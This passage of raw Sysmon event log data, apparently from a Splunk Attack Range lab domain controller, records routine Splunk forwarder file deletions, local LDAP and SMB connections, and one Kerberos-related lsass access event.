Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FB176985DC285A80907AF6C7549A63E,SHA256=3E8405FABBCF7A7516F18F8EE320D1F92CEC101FBDB2D3B11249861E8F5BAA00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034790Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:17.921{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15FE6728E7C73332817561F470AB6CF,SHA256=BB1741FCE67EE4DB299058825FB1E154056F7E79323782FE0190806AAC390844,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034789Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:14.297{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61898-false10.0.1.12-8000- 23542300x800000000000000034788Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:17.335{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=247616BF83075C83A083419737AA8768,SHA256=AFC8132697D97B4868BE575C23A58F62FD25A083A43ABD14371C19D04209BA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034787Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:17.335{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=639E7BC02BC9E81ED71FB9949E6E3507,SHA256=31C8022A942B649E90478EFBCD15D5563A30C2CE0EE9EE600ADFAFA9862CDF0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034786Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:17.335{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F778D4BCA4FD856FB26666CAC88DCCDA,SHA256=99DD17E2B84E96A8110A393DFD95F8C42E95C64DB9493B4B0C70B9404C660355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034791Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:19.093{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E836D5C6E25DC5FD8BD0B96ADCC1FFB,SHA256=BCE236ECD65035554374C91C8B04A1BDAB5ECF17FAA481E8E87AC592F0ADEBE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034792Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:20.242{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC0A7A0CC2F264C766A2560F2C458D8,SHA256=AB4CA6B11ED15851AF31C2C04CDC9A03B016094D18C2E0565595069A00310DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034793Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:21.414{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5936A95CC1B73DFC247B18C0DEE03C7,SHA256=1339669A13A6621FA93453957FC4548908CDF584EAD112A38EAF05EC188FBBE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034794Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:22.581{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E48D015D7C3D53751B240969DC1C2BB,SHA256=92EBB851AAE5F7FF4922B4C6B0D36D7672D522C5B01D982B7F218214DC0BACFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034798Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:23.736{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED103C5CEC3F9EF491980F40879E1B29,SHA256=008032EA1BF19BEF6E0DF54C247A206F2A45515B767978A28DD04A3E0D088A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034797Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:23.150{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FCAD3D5D05825D52A59FD50E9BF92038,SHA256=5A77C6D703217A270387386D65A9445AD8598C1ADC715E296CD614B2D7595686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034796Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:23.150{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0A6DA8C27878846DF1869147E0CF842,SHA256=1C5EA433E820DAF54DCB410B6698208ADD701235112EBA5586A7E49F2701EEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034795Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:23.150{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=639E7BC02BC9E81ED71FB9949E6E3507,SHA256=31C8022A942B649E90478EFBCD15D5563A30C2CE0EE9EE600ADFAFA9862CDF0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034800Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:24.908{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E652170EA98A4AA19EA10C22280B66,SHA256=6AFDB985EC4F741C8323DEC625288AF39E2358704B68FB5D52863968A95B5E3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034799Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:20.328{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61899-false10.0.1.12-8000- 23542300x800000000000000034801Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.057{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042A71D5F3B2C5CDAD0204BAD2AC59D7,SHA256=00E0852992FCF257D90B9BCBA7DF7BD478ECEEF43A04FA8DAA338369918A7043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034805Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:28.717{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FEA083D2BB51D5A4CC27C90181161E5,SHA256=066EBF0A3AD3D894CC571A5BF2A8B3FF2A089D826E83C5DFB9A228FB2AEB6B06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034804Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:28.717{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0A6DA8C27878846DF1869147E0CF842,SHA256=1C5EA433E820DAF54DCB410B6698208ADD701235112EBA5586A7E49F2701EEAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034803Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:28.680{CB3070D7-7997-6042-0B00-00000000AD01}6283896C:\Windows\system32\lsass.exe{CB3070D7-7995-6042-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000034802Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:28.063{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF1A2A996110862725837CF8EC0B9077,SHA256=1EF0A5FF76261DCD79861147E456D9B5E426575C4EED9EDD7A6495952E3D7336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034808Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:29.901{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FEA083D2BB51D5A4CC27C90181161E5,SHA256=066EBF0A3AD3D894CC571A5BF2A8B3FF2A089D826E83C5DFB9A228FB2AEB6B06,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034807Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:25.357{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61900-false10.0.1.12-8000- 23542300x800000000000000034806Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:29.319{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B61CE392E6ECB1FDCC87A66685EC8E2C,SHA256=1406387B9558F8DB3F3C70FA5EE90BCDC5EAB49C28D279C707E34708B1E6701A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034815Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.894{CB3070D7-7995-6042-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local61903-truefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local445microsoft-ds 354300x800000000000000034814Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.894{CB3070D7-7995-6042-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local61903-truefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local445microsoft-ds 354300x800000000000000034813Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.800{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-725.attackrange.local61902-false10.0.1.14win-dc-725.attackrange.local389ldap 354300x800000000000000034812Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.800{CB3070D7-7998-6042-1000-00000000AD01}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61902-false10.0.1.14win-dc-725.attackrange.local389ldap 354300x800000000000000034811Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.794{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local61901-truefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local389ldap 354300x800000000000000034810Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:26.794{CB3070D7-7998-6042-1000-00000000AD01}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local61901-truefe80:0:0:0:65dd:521b:bf8a:8b06win-dc-725.attackrange.local389ldap 23542300x800000000000000034809Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:30.484{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE2E7B1AD226822348A507796F755A5,SHA256=AE1E762D3419DDCA398A9C7209B565F6AC6B24AC84DC625B3550DCD2E01E4CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034817Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:31.641{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D5BFB4E82A8FD214EC906A4A97770F8,SHA256=BB42421093C054847CCC5112B7F3A87B032676C9F423192001E4546FBFCA60E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034816Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:31.070{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BE45CBE9D874C338110D2888D5D95009,SHA256=1FBC9472BDD6942F59F3E9A9A451332AF4752328C4D767AE1FCB4DE4DF2D03C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034818Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:32.807{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6747FD1217A53C672D3D50DEFDA06B4A,SHA256=07FF19F8263DE7933F167039EC2F6611B318D8C952045B7D570E2F46BF496D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034820Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:33.994{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=177E0DD740311C8773CBD1AC598CFE99,SHA256=AB15EE562D60664D4950FB25840A5664D48B4941A2D21A8F865FA0F3FCE91654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034819Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:33.994{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556EC12E3765D2CFBDB143AF545CC4FC,SHA256=8AA2295DA70F55E69CBA02C88049C2A04A125DD0E2AA6CD3B7319CBE68F634FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034823Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:31.403{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61905-false10.0.1.12-8000- 354300x800000000000000034822Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:30.739{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local61904-true0:0:0:0:0:0:0:1win-dc-725.attackrange.local389ldap 354300x800000000000000034821Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:30.739{CB3070D7-79A8-6042-2A00-00000000AD01}3068C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local61904-true0:0:0:0:0:0:0:1win-dc-725.attackrange.local389ldap 23542300x800000000000000034824Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:35.150{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE8FC8E7BE8229349DE43D74EA49C4A0,SHA256=4AAE8B1DCAFFD0D16926E107430170CC6DAB76B12BBF5E580755C0B7A611D867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034826Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:36.885{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AA28E2B3E0B0C3AF199FE2957CB87CB4,SHA256=0A82A90E4C80FBD0C77D60C7D76478C5BB3FE7D5E413F5ABF1C1F530B51F62A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034825Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:36.316{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=823F0DCA83B92344849BFF5D0944824D,SHA256=6C1EE9B056F94B3547D25D6BD2DA144520CF0EF6FC3A4F4B686352BAB2A94090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034827Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:37.471{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F64F8C8F324304FB77FA0F4BDA13FEF,SHA256=7CAC1710C04DB58A3467CCCED75B5C72AC3FE14B59F16A6AC264348B07442885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034828Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:38.643{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A4393C232879DC5F3726CA4C06A1752,SHA256=A378BE88CBF246BF3FB556EB2BFBCA91BC42A56E3F5B4E3852DFAEA01E4501D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034829Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:39.793{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CCDD068CB8D68E17D74AAD6F4EC1924,SHA256=268C3B9E6C1CA1694D3F862AAB3EE84FA6A99C70E2874E7A2B03BF44DA713A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034833Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:40.965{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=390DA78B9B11F4E28208BD31009E59BD,SHA256=04E57500A4459DD2A468077A27ACCDFE1568961507B9D7FE0FAD00DE8FE47AEE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034832Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:37.434{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61906-false10.0.1.12-8000- 23542300x800000000000000034831Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:40.379{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B633E08D3153199A8487DDA3BAE551EF,SHA256=DD0C86619CF936839B75D92CD3CBF929381F4DBA44D950AE138B0D97D6EE203B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034830Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:40.379{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C51F586EB6DF6C70BF10ED495D599F0,SHA256=99F77E693B88F88FECE248BAC6FA4C9AFDB267F57748C4C49468960FB8E36A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034835Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:42.716{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6A7CB39CA9A9EF63E0988C9FB2AF21ED,SHA256=4847F1FA067BD1E3E384107B6F93AFAE3BBFD6203404461BFE42FE7B7EE11185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034834Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:42.131{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5FD4DE43522DF75C104DA75BC11B73,SHA256=43F972B928608E2E4B3183BB71EA4B36627A6FDC74DB3088F1F4FCAE041A7F04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034836Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:43.287{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0398E033A22867965C6E02DA5941911B,SHA256=F2FB95EB411CBCC2CCBC1A9855D9F90F9E3F72BC4E8C74645DC42A2D5575EC0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034837Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:44.458{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8CB23B63D10EB8AE2255C815E90900B,SHA256=FFA814AEAF99D5D14B54312BD28794108A24B29BD0F469D491D82D2CEE82A4D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034841Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:42.470{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 